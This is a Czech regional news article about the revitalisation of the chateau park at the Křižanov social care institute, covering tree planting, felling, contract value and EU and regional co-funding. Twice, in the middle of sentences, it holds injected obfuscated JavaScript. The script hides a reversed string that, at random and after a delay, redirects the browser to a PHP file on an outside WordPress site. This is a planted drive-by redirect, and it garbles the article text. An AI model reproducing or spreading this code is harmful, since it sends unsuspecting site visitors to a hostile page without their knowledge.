Křižanov, krizanov, aktuality, park, revitalizace
Rainbow page separator

V Křižanově začala revitalizace parku

Čtvrtek, 13. prosince 2012

Křižanov / Komplexními úpravami projde veškerá zeleň v křižanovském zámeckém parku, a ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v rámci projektu Kraje Vysočina s názvem Revitalizace parků v zařízeních zřizovaných Krajem Vysočina, který byl již zahájen. Bude realizován v areálech příspěvkových organizací, které zřizuje Kraj Vysočina, což jsou dětské domovy, domovy pro seniory, ústavy sociální péče či zdravotnická zařízení, mimo jiné právě i v zámeckém parku při Ústavu sociální péče v Křižanově.

Celý areál byl vyhlášen jako státem chráněná památka a současně poskytuje ú["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}točiště pro vzácné druhy živočichů. Opatření a zásahy odborníků budou zaměřeny na zvýšení bezpečnosti návštěvníků a zlepšení zdravotního stavu dřevin. V křižanovském zámeckém parku bude vysazeno 4 172 kusů dřevin, odborně ošetřeno 129 kusů a pokáceno 103 starých a nemocných stromů.

Předpokládanou hodnotu veřejné zakázky ve výši 2,7 milionu korun se podařilo snížit na 1 094 189 korun. Na spolufinancování se bude podílet ze 70 procent Evropský fond pro regionální rozvoj, z národních zdrojů půjde pět procent potřebných financí a podíl krajského rozpočtu činí pětadvacet procent výdajů. V reálných číslech tedy přispěje Evropský fond pro regionální rozvoj 766 tisíci korunami, stát vypomůže pětapadesáti tisíci a Kraj Vysočina do revitalizace vloží 273 tisíc korun.

Práce budou probíhat více než dva roky, předpokládané předání zrevizalizovaného parku je stanoveno na prosinec 2014.